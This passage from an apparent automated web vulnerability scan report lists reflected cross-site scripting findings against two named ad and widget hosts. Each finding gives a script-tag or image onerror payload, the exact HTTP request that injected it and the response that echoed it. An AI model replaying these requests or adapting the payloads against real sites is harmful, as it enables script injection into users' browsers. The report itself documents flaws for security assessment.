Cookie: JEB2=4CD6406B6E651A44E171CE41F0006986; atdses=O;

Response

HTTP/1.0 200 OK
Connection: close
Content-Type: text/html
Content-Length: 229

<html><body><base target=_top><script language="JavaScript" type="text/javascript" src="http://at.atwola.com/addyn/3.0696bf"><script>alert(1)</script>ef60ef84e1e/5113.1/221794/0/-1/size=300x250;adiframe=y">
...[SNIP]...

2.42. http://at.atwola.com/adiframe/3.0/5113.1/221794/0/-1/size=300x250 [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://at.atwola.com
Path:   /adiframe/3.0/5113.1/221794/0/-1/size=300x250

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e000b"><script>alert(1)</script>737cb734964 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adiframe/3.0/5113.1e000b"><script>alert(1)</script>737cb734964/221794/0/-1/size=300x250 HTTP/1.1
Host: at.atwola.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JEB2=4CD6406B6E651A44E171CE41F0006986; atdses=O;

Response

HTTP/1.0 200 OK
Connection: close
Content-Type: text/html
Content-Length: 229

<html><body><base target=_top><script language="JavaScript" type="text/javascript" src="http://at.atwola.com/addyn/3.0/5113.1e000b"><script>alert(1)</script>737cb734964/221794/0/-1/size=300x250;adiframe=y">
...[SNIP]...

2.43. http://at.atwola.com/adiframe/3.0/5113.1/221794/0/-1/size=300x250 [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://at.atwola.com
Path:   /adiframe/3.0/5113.1/221794/0/-1/size=300x250

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8bbc4"><script>alert(1)</script>a1d6b9ee5d6 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adiframe/3.0/5113.1/2217948bbc4"><script>alert(1)</script>a1d6b9ee5d6/0/-1/size=300x250 HTTP/1.1
Host: at.atwola.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JEB2=4CD6406B6E651A44E171CE41F0006986; atdses=O;

Response

HTTP/1.0 200 OK
Connection: close
Content-Type: text/html
Content-Length: 229

<html><body><base target=_top><script language="JavaScript" type="text/javascript" src="http://at.atwola.com/addyn/3.0/5113.1/2217948bbc4"><script>alert(1)</script>a1d6b9ee5d6/0/-1/size=300x250;adiframe=y">
...[SNIP]...

2.44. http://at.atwola.com/adiframe/3.0/5113.1/221794/0/-1/size=300x250 [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://at.atwola.com
Path:   /adiframe/3.0/5113.1/221794/0/-1/size=300x250

Issue detail

The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d3eed"><script>alert(1)</script>116ca518a2a was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adiframe/3.0/5113.1/221794/0d3eed"><script>alert(1)</script>116ca518a2a/-1/size=300x250 HTTP/1.1
Host: at.atwola.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JEB2=4CD6406B6E651A44E171CE41F0006986; atdses=O;

Response

HTTP/1.0 200 OK
Connection: close
Content-Type: text/html
Content-Length: 229

<html><body><base target=_top><script language="JavaScript" type="text/javascript" src="http://at.atwola.com/addyn/3.0/5113.1/221794/0d3eed"><script>alert(1)</script>116ca518a2a/-1/size=300x250;adiframe=y">
...[SNIP]...

2.45. http://at.atwola.com/adiframe/3.0/5113.1/221794/0/-1/size=300x250 [REST URL parameter 6]

Summary

Severity:   High
Confidence:   Certain
Host:   http://at.atwola.com
Path:   /adiframe/3.0/5113.1/221794/0/-1/size=300x250

Issue detail

The value of REST URL parameter 6 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload fd0ad"><script>alert(1)</script>3d04e0a0b58 was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adiframe/3.0/5113.1/221794/0/-1fd0ad"><script>alert(1)</script>3d04e0a0b58/size=300x250 HTTP/1.1
Host: at.atwola.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JEB2=4CD6406B6E651A44E171CE41F0006986; atdses=O;

Response

HTTP/1.0 200 OK
Connection: close
Content-Type: text/html
Content-Length: 229

<html><body><base target=_top><script language="JavaScript" type="text/javascript" src="http://at.atwola.com/addyn/3.0/5113.1/221794/0/-1fd0ad"><script>alert(1)</script>3d04e0a0b58/size=300x250;adiframe=y">
...[SNIP]...

2.46. http://at.atwola.com/adiframe/3.0/5113.1/221794/0/-1/size=300x250 [REST URL parameter 7]

Summary

Severity:   High
Confidence:   Certain
Host:   http://at.atwola.com
Path:   /adiframe/3.0/5113.1/221794/0/-1/size=300x250

Issue detail

The value of REST URL parameter 7 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 87afe"><script>alert(1)</script>db17970b29 was submitted in the REST URL parameter 7. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adiframe/3.0/5113.1/221794/0/-1/size87afe"><script>alert(1)</script>db17970b29=300x250 HTTP/1.1
Host: at.atwola.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JEB2=4CD6406B6E651A44E171CE41F0006986; atdses=O;

Response

HTTP/1.0 200 OK
Connection: close
Content-Type: text/html
Content-Length: 228

<html><body><base target=_top><script language="JavaScript" type="text/javascript" src="http://at.atwola.com/addyn/3.0/5113.1/221794/0/-1/size87afe"><script>alert(1)</script>db17970b29=300x250;adiframe=y">
...[SNIP]...

2.47. http://at.atwola.com/adiframe/3.0/5113.1/221794/0/-1/size=300x250 [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://at.atwola.com
Path:   /adiframe/3.0/5113.1/221794/0/-1/size=300x250

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 408d4"><script>alert(1)</script>25739075e9e was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adiframe/3.0/5113.1/221794/0/-1/size=300x250?408d4"><script>alert(1)</script>25739075e9e=1 HTTP/1.1
Host: at.atwola.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JEB2=4CD6406B6E651A44E171CE41F0006986; atdses=O;

Response

HTTP/1.0 200 OK
Connection: close
Content-Type: text/html
Content-Length: 232

<html><body><base target=_top><script language="JavaScript" type="text/javascript" src="http://at.atwola.com/addyn/3.0/5113.1/221794/0/-1/size=300x250?408d4"><script>alert(1)</script>25739075e9e=1;adiframe=y">
...[SNIP]...

2.48. http://cdn.widgetserver.com/syndication/json/i/53234a87-ed5a-47ec-859e-f6aaec12e3ce/iv/1/p/3/r/eac2065f-95e1-4573-805c-6f32ddae7508/rv/13/t/f64d76295ed0b672ed31ff918b9dafdc2d62f9140000012cecf23a8a/u/3/ [REST URL parameter 14]

Summary

Severity:   High
Confidence:   Certain
Host:   http://cdn.widgetserver.com
Path:   /syndication/json/i/53234a87-ed5a-47ec-859e-f6aaec12e3ce/iv/1/p/3/r/eac2065f-95e1-4573-805c-6f32ddae7508/rv/13/t/f64d76295ed0b672ed31ff918b9dafdc2d62f9140000012cecf23a8a/u/3/

Issue detail

The value of REST URL parameter 14 is copied into the HTML document as plain text between tags. The payload 6584e<img%20src%3da%20onerror%3dalert(1)>08a51aba132 was submitted in the REST URL parameter 14. This input was echoed as 6584e<img src=a onerror=alert(1)>08a51aba132 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /syndication/json/i/53234a87-ed5a-47ec-859e-f6aaec12e3ce/iv/1/p/3/r/eac2065f-95e1-4573-805c-6f32ddae7508/rv/13/t/f64d76295ed0b672ed31ff918b9dafdc2d62f9140000012cecf23a8a6584e<img%20src%3da%20onerror%3dalert(1)>08a51aba132/u/3/ HTTP/1.1
Host: cdn.widgetserver.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript;charset=UTF-8
Date: Thu, 16 Dec 2010 15:01:12 GMT
Expires: Sun, 19 Dec 2010 15:00:12 GMT
P3P: CP="NON ADMa OUR IND PHY ONL UNI COM NAV STA"
Server: Apache/2.2.3 (Red Hat)
Content-Length: 7576
Connection: close

WIDGETBOX.subscriber.Main.onWidgetResponse({"widgets":[{"enabledState":"0","initParams":"wbx_theme_mod=%23ffffff&wbx_stageHeight=500&wbx_tab_1_default_image=http%3A%2F%2Ffiles.widgetbox.com%2Fservices
...[SNIP]...
s":false,"isAdEnabled":false,"adPlacement":"TL","categories":"","thumbFilePath":"/thumbs/eac2065f-95e1-4573-805c-6f32ddae7508.png?13"}],"token":"f64d76295ed0b672ed31ff918b9dafdc2d62f9140000012cecf23a8a6584e<img src=a onerror=alert(1)>08a51aba132"});

2.49. http://cdn.widgetserver.com/syndication/json/i/53234a87-ed5a-47ec-859e-f6aaec12e3ce/iv/1/p/3/r/eac2065f-95e1-4573-805c-6f32ddae7508/rv/13/t/f64d76295ed0b672ed31ff918b9dafdc2d62f9140000012cecf23a8a/u/3/ [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Firm
Host:   http://cdn.widgetserver.com
Path:   /syndication/json/i/53234a87-ed5a-47ec-859e-f6aaec12e3ce/iv/1/p/3/r/eac2065f-95e1-4573-805c-6f32ddae7508/rv/13/t/f64d76295ed0b672ed31ff918b9dafdc2d62f9140000012cecf23a8a/u/3/

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 38aea<a>22467d2f7ac was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /syndication/json/i/53234a87-ed5a-47ec-859e-f6aaec12e3ce38aea<a>22467d2f7ac/iv/1/p/3/r/eac2065f-95e1-4573-805c-6f32ddae7508/rv/13/t/f64d76295ed0b672ed31ff918b9dafdc2d62f9140000012cecf23a8a/u/3/ HTTP/1.1
Host: cdn.widgetserver.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Content-Type: application/x-javascript;charset=UTF-8
Date: Thu, 16 Dec 2010 15:00:52 GMT
Expires: Sun, 7 May 1995 12:00:00 GMT
P3P: CP="NON ADMa OUR IND PHY ONL UNI COM NAV STA"
Pragma: no-cache
Server: Apache/2.2.3 (Red Hat)
Content-Length: 1158
Connection: close

WIDGETBOX.subscriber.Main.onWidgetResponse({"widgets":[{"userPK":"","initParams":"","hasDynamicStyle":false,"appId":"53234a87-ed5a-47ec-859e-f6aaec12e3ce38aea<a>22467d2f7ac","providerServiceLevel":"","fromPartnerNetworkCode":"","appWidth":"120","appHeight":"120","subscribeMode":"DISABLE_GW","regPK":"","instServiceLevel":"","shortDescr":"","serviceLevel":"","hasDynamicSiz
...[SNIP]...

2.50. http://cdn.widgetserver.com/syndication/json/i/88d52cec-a4e9-4f57-8664-f271aade0138/iv/1/p/3/r/b991680e-982b-4348-83cc-c530351cfdce/rv/43/t/c0d6f7a5f457f6b32ad304af9ae46daf72b43e7f0000012ce3e109d5/u/3/ [REST URL parameter 14]

Summary

Severity:   High
Confidence:   Certain
Host:   http://cdn.widgetserver.com
Path:   /syndication/json/i/88d52cec-a4e9-4f57-8664-f271aade0138/iv/1/p/3/r/b991680e-982b-4348-83cc-c530351cfdce/rv/43/t/c0d6f7a5f457f6b32ad304af9ae46daf72b43e7f0000012ce3e109d5/u/3/

Issue detail

The value of REST URL parameter 14 is copied into the HTML document as plain text between tags. The payload 88370<img%20src%3da%20onerror%3dalert(1)>8cad21eecc was submitted in the REST URL parameter 14. This input was echoed as 88370<img src=a onerror=alert(1)>8cad21eecc in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /syndication/json/i/88d52cec-a4e9-4f57-8664-f271aade0138/iv/1/p/3/r/b991680e-982b-4348-83cc-c530351cfdce/rv/43/t/c0d6f7a5f457f6b32ad304af9ae46daf72b43e7f0000012ce3e109d588370<img%20src%3da%20onerror%3dalert(1)>8cad21eecc/u/3/ HTTP/1.1
Host: cdn.widgetserver.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript;charset=UTF-8
Date: Thu, 16 Dec 2010 15:01:14 GMT
Expires: Sun, 19 Dec 2010 15:00:14 GMT
P3P: CP="NON ADMa OUR IND PHY ONL UNI COM NAV STA"
Server: Apache/2.2.3 (Red Hat)
Content-Length: 7550
Connection: close

WIDGETBOX.subscriber.Main.onWidgetResponse({"widgets":[{"enabledState":"0","initParams":"wbx_theme_mod=%23FFFFFF&wbx_stageHeight=500&wbx_tab_1_default_image=http%3A%2F%2Ffiles.widgetbox.com%2Fservices
...[SNIP]...
s":false,"isAdEnabled":false,"adPlacement":"TL","categories":"","thumbFilePath":"/thumbs/b991680e-982b-4348-83cc-c530351cfdce.jpg?43"}],"token":"c0d6f7a5f457f6b32ad304af9ae46daf72b43e7f0000012ce3e109d588370<img src=a onerror=alert(1)>8cad21eecc"});

2.51. http://cdn.widgetserver.com/syndication/json/i/88d52cec-a4e9-4f57-8664-f271aade0138/iv/1/p/3/r/b991680e-982b-4348-83cc-c530351cfdce/rv/43/t/c0d6f7a5f457f6b32ad304af9ae46daf72b43e7f0000012ce3e109d5/u/3/ [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Firm
Host:   http://cdn.widgetserver.com
Path:   /syndication/json/i/88d52cec-a4e9-4f57-8664-f271aade0138/iv/1/p/3/r/b991680e-982b-4348-83cc-c530351cfdce/rv/43/t/c0d6f7a5f457f6b32ad304af9ae46daf72b43e7f0000012ce3e109d5/u/3/

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 45296<a>dc6117bca29 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /syndication/json/i/88d52cec-a4e9-4f57-8664-f271aade013845296<a>dc6117bca29/iv/1/p/3/r/b991680e-982b-4348-83cc-c530351cfdce/rv/43/t/c0d6f7a5f457f6b32ad304af9ae46daf72b43e7f0000012ce3e109d5/u/3/ HTTP/1.1
Host: cdn.widgetserver.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Content-Type: application/x-javascript;charset=UTF-8
Date: Thu, 16 Dec 2010 15:00:52 GMT
Expires: Sun, 7 May 1995 12:00:00 GMT
P3P: CP="NON ADMa OUR IND PHY ONL UNI COM NAV STA"
Pragma: no-cache
Server: Apache/2.2.3 (Red Hat)
Content-Length: 1158
Connection: close

WIDGETBOX.subscriber.Main.onWidgetResponse({"widgets":[{"userPK":"","initParams":"","hasDynamicStyle":false,"appId":"88d52cec-a4e9-4f57-8664-f271aade013845296<a>dc6117bca29","providerServiceLevel":"","fromPartnerNetworkCode":"","appWidth":"120","appHeight":"120","subscribeMode":"DISABLE_GW","regPK":"","instServiceLevel":"","shortDescr":"","serviceLevel":"","hasDynamicSiz
...[SNIP]...

2.52. http://cdn.widgetserver.com/syndication/json/i/8fa3ae7e-6c39-4fa0-afc7-39d1d89ea475/iv/1/p/3/r/bce84d00-4da9-4b02-b59b-1d59bdf7e168/rv/12/t/1f59a4c15309195fbf6c02f585b3c55b663f95780000012ce3416e2c/u/3/ [REST URL parameter 14]

Summary

Severity:   High
Confidence:   Certain
Host:   http://cdn.widgetserver.com
Path:   /syndication/json/i/8fa3ae7e-6c39-4fa0-afc7-39d1d89ea475/iv/1/p/3/r/bce84d00-4da9-4b02-b59b-1d59bdf7e168/rv/12/t/1f59a4c15309195fbf6c02f585b3c55b663f95780000012ce3416e2c/u/3/

Issue detail

The value of REST URL parameter 14 is copied into the HTML document as plain text between tags. The payload 40923<img%20src%3da%20onerror%3dalert(1)>b9cd89d2e8c was submitted in the REST URL parameter 14. This input was echoed as 40923<img src=a onerror=alert(1)>b9cd89d2e8c in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /syndication/json/i/8fa3ae7e-6c39-4fa0-afc7-39d1d89ea475/iv/1/p/3/r/bce84d00-4da9-4b02-b59b-1d59bdf7e168/rv/12/t/1f59a4c15309195fbf6c02f585b3c55b663f95780000012ce3416e2c40923<img%20src%3da%20onerror%3dalert(1)>b9cd89d2e8c/u/3/ HTTP/1.1
Host: cdn.widgetserver.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript;charset=UTF-8
Date: Thu, 16 Dec 2010 15:01:09 GMT
Expires: Sun, 19 Dec 2010 15:00:09 GMT
P3P: CP="NON ADMa OUR IND PHY ONL UNI COM NAV STA"
Server: Apache/2.2.3 (Red Hat)
Content-Length: 7577
Connection: close

WIDGETBOX.subscriber.Main.onWidgetResponse({"widgets":[{"enabledState":"0","initParams":"wbx_theme_mod=%23ffffff&wbx_stageHeight=500&wbx_tab_1_default_image=http%3A%2F%2Ffiles.widgetbox.com%2Fservices
...[SNIP]...
s":false,"isAdEnabled":false,"adPlacement":"TL","categories":"","thumbFilePath":"/thumbs/bce84d00-4da9-4b02-b59b-1d59bdf7e168.png?12"}],"token":"1f59a4c15309195fbf6c02f585b3c55b663f95780000012ce3416e2c40923<img src=a onerror=alert(1)>b9cd89d2e8c"});

2.53. http://cdn.widgetserver.com/syndication/json/i/8fa3ae7e-6c39-4fa0-afc7-39d1d89ea475/iv/1/p/3/r/bce84d00-4da9-4b02-b59b-1d59bdf7e168/rv/12/t/1f59a4c15309195fbf6c02f585b3c55b663f95780000012ce3416e2c/u/3/ [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Firm
Host:   http://cdn.widgetserver.com
Path:   /syndication/json/i/8fa3ae7e-6c39-4fa0-afc7-39d1d89ea475/iv/1/p/3/r/bce84d00-4da9-4b02-b59b-1d59bdf7e168/rv/12/t/1f59a4c15309195fbf6c02f585b3c55b663f95780000012ce3416e2c/u/3/

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 93b0e<a>3573c4fa22e was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /syndication/json/i/8fa3ae7e-6c39-4fa0-afc7-39d1d89ea47593b0e<a>3573c4fa22e/iv/1/p/3/r/bce84d00-4da9-4b02-b59b-1d59bdf7e168/rv/12/t/1f59a4c15309195fbf6c02f585b3c55b663f95780000012ce3416e2c/u/3/ HTTP/1.1
Host: cdn.widgetserver.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Content-Type: application/x-javascript;charset=UTF-8
Date: Thu, 16 Dec 2010 15:00:49 GMT
Expires: Sun, 7 May 1995 12:00:00 GMT
P3P: CP="NON ADMa OUR IND PHY ONL UNI COM NAV STA"
Pragma: no-cache
Server: Apache/2.2.3 (Red Hat)
Content-Length: 1158
Connection: close

WIDGETBOX.subscriber.Main.onWidgetResponse({"widgets":[{"userPK":"","initParams":"","hasDynamicStyle":false,"appId":"8fa3ae7e-6c39-4fa0-afc7-39d1d89ea47593b0e<a>3573c4fa22e","providerServiceLevel":"","fromPartnerNetworkCode":"","appWidth":"120","appHeight":"120","subscribeMode":"DISABLE_GW","regPK":"","instServiceLevel":"","shortDescr":"","serviceLevel":"","hasDynamicSiz
...[SNIP]...

2.54. http://cdn.widgetserver.com/syndication/platform/InsertWidget/id/53234a87-ed5a-47ec-859e-f6aaec12e3ce/__c__,wbx_ns_image,http://img.widgetbox.com/uploaded/4b6826897bb8645bb2b9fab3dc625b96/ibmbackupm.png,wbx_ns_link,http://ad.doubleclick.net/clk [REST URL parameter 10]

Summary

Severity:   High
Confidence:   Certain
Host:   http://cdn.widgetserver.com
Path:   /syndication/platform/InsertWidget/id/53234a87-ed5a-47ec-859e-f6aaec12e3ce/__c__,wbx_ns_image,http://img.widgetbox.com/uploaded/4b6826897bb8645bb2b9fab3dc625b96/ibmbackupm.png,wbx_ns_link,http://ad.doubleclick.net/clk

Issue detail

The value of REST URL parameter 10 is copied into the HTML document as plain text between tags. The payload 5c64f<img%20src%3da%20onerror%3dalert(1)>4f10f27000f was submitted in the REST URL parameter 10. This input was echoed as 5c64f<img src=a onerror=alert(1)>4f10f27000f in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /syndication/platform/InsertWidget/id/53234a87-ed5a-47ec-859e-f6aaec12e3ce/__c__,wbx_ns_image,http://img.widgetbox.com/uploaded/4b6826897bb8645bb2b9fab3dc625b96/ibmbackupm.png,wbx_ns_link,http:5c64f<img%20src%3da%20onerror%3dalert(1)>4f10f27000f//ad.doubleclick.net/clk HTTP/1.1
Host: cdn.widgetserver.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript;charset=UTF-8
Date: Thu, 16 Dec 2010 15:01:06 GMT
P3P: CP="NON ADMa OUR IND PHY ONL UNI COM NAV STA"
Server: Apache/2.2.3 (Red Hat)
Connection: close
Content-Length: 17789


if(!window.WIDGETBOX){(function(){var D=false;var C=function(){WIDGETBOX.setPageLoaded();};var B=function(){WIDGETBOX.setPageUnloaded();};WIDGETBOX={libs:{},version:"45670",urls:{runtimeBaseUrl
...[SNIP]...
a-47ec-859e-f6aaec12e3ce","platform":"InsertWidget"},

configurationParams : {"wbx_ns_image":"http://img.widgetbox.com/uploaded/4b6826897bb8645bb2b9fab3dc625b96/ibmbackupm.png","wbx_ns_link":"http:5c64f<img src=a onerror=alert(1)>4f10f27000f//ad.doubleclick.net/clk"},

processPathParameters : function(){

var fifMode = WIDGETBOX.platform.WidgetConfigPathHandler.initializationParams["fif"];
if(fifMode && WIDGETBOX.platf
...[SNIP]...

2.55. http://cdn.widgetserver.com/syndication/platform/InsertWidget/id/53234a87-ed5a-47ec-859e-f6aaec12e3ce/__c__,wbx_ns_image,http://img.widgetbox.com/uploaded/4b6826897bb8645bb2b9fab3dc625b96/ibmbackupm.png,wbx_ns_link,http://ad.doubleclick.net/clk [REST URL parameter 11]

Summary

Severity:   High
Confidence:   Certain
Host:   http://cdn.widgetserver.com
Path:   /syndication/platform/InsertWidget/id/53234a87-ed5a-47ec-859e-f6aaec12e3ce/__c__,wbx_ns_image,http://img.widgetbox.com/uploaded/4b6826897bb8645bb2b9fab3dc625b96/ibmbackupm.png,wbx_ns_link,http://ad.doubleclick.net/clk

Issue detail

The value of REST URL parameter 11 is copied into the HTML document as plain text between tags. The payload ee675<img%20src%3da%20onerror%3dalert(1)>9295dd52fa7 was submitted in the REST URL parameter 11. This input was echoed as ee675<img src=a onerror=alert(1)>9295dd52fa7 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /syndication/platform/InsertWidget/id/53234a87-ed5a-47ec-859e-f6aaec12e3ce/__c__,wbx_ns_image,http://img.widgetbox.com/uploaded/4b6826897bb8645bb2b9fab3dc625b96/ibmbackupm.png,wbx_ns_link,http://ad.doubleclick.netee675<img%20src%3da%20onerror%3dalert(1)>9295dd52fa7/clk HTTP/1.1
Host: cdn.widgetserver.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript;charset=UTF-8
Date: Thu, 16 Dec 2010 15:01:09 GMT
P3P: CP="NON ADMa OUR IND PHY ONL UNI COM NAV STA"
Server: Apache/2.2.3 (Red Hat)
Connection: close
Content-Length: 17789


if(!window.WIDGETBOX){(function(){var D=false;var C=function(){WIDGETBOX.setPageLoaded();};var B=function(){WIDGETBOX.setPageUnloaded();};WIDGETBOX={libs:{},version:"45670",urls:{runtimeBaseUrl
...[SNIP]...
e3ce","platform":"InsertWidget"},

configurationParams : {"wbx_ns_image":"http://img.widgetbox.com/uploaded/4b6826897bb8645bb2b9fab3dc625b96/ibmbackupm.png","wbx_ns_link":"http://ad.doubleclick.netee675<img src=a onerror=alert(1)>9295dd52fa7/clk"},

processPathParameters : function(){

var fifMode = WIDGETBOX.platform.WidgetConfigPathHandler.initializationParams["fif"];
if(fifMode && WIDGETBOX.platform.FriendlyIFrame){
...[SNIP]...

2.56. http://cdn.widgetserver.com/syndication/platform/InsertWidget/id/53234a87-ed5a-47ec-859e-f6aaec12e3ce/__c__,wbx_ns_image,http://img.widgetbox.com/uploaded/4b6826897bb8645bb2b9fab3dc625b96/ibmbackupm.png,wbx_ns_link,http://ad.doubleclick.net/clk [REST URL parameter 12]

Summary

Severity:   High
Confidence:   Certain
Host:   http://cdn.widgetserver.com
Path:   /syndication/platform/InsertWidget/id/53234a87-ed5a-47ec-859e-f6aaec12e3ce/__c__,wbx_ns_image,http://img.widgetbox.com/uploaded/4b6826897bb8645bb2b9fab3dc625b96/ibmbackupm.png,wbx_ns_link,http://ad.doubleclick.net/clk

Issue detail

The value of REST URL parameter 12 is copied into the HTML document as plain text between tags. The payload de6bd<img%20src%3da%20onerror%3dalert(1)>79ed0ebf432 was submitted in the REST URL parameter 12. This input was echoed as de6bd<img src=a onerror=alert(1)>79ed0ebf432 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /syndication/platform/InsertWidget/id/53234a87-ed5a-47ec-859e-f6aaec12e3ce/__c__,wbx_ns_image,http://img.widgetbox.com/uploaded/4b6826897bb8645bb2b9fab3dc625b96/ibmbackupm.png,wbx_ns_link,http://ad.doubleclick.net/clkde6bd<img%20src%3da%20onerror%3dalert(1)>79ed0ebf432 HTTP/1.1
Host: cdn.widgetserver.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript;charset=UTF-8
Date: Thu, 16 Dec 2010 15:01:12 GMT
P3P: CP="NON ADMa OUR IND PHY ONL UNI COM NAV STA"
Server: Apache/2.2.3 (Red Hat)
Connection: close
Content-Length: 17789


if(!window.WIDGETBOX){(function(){var D=false;var C=function(){WIDGETBOX.setPageLoaded();};var B=function(){WIDGETBOX.setPageUnloaded();};WIDGETBOX={libs:{},version:"45670",urls:{runtimeBaseUrl
...[SNIP]...
","platform":"InsertWidget"},

configurationParams : {"wbx_ns_image":"http://img.widgetbox.com/uploaded/4b6826897bb8645bb2b9fab3dc625b96/ibmbackupm.png","wbx_ns_link":"http://ad.doubleclick.net/clkde6bd<img src=a onerror=alert(1)>79ed0ebf432"},

processPathParameters : function(){

var fifMode = WIDGETBOX.platform.WidgetConfigPathHandler.initializationParams["fif"];
if(fifMode && WIDGETBOX.platform.FriendlyIFrame){

...[SNIP]...

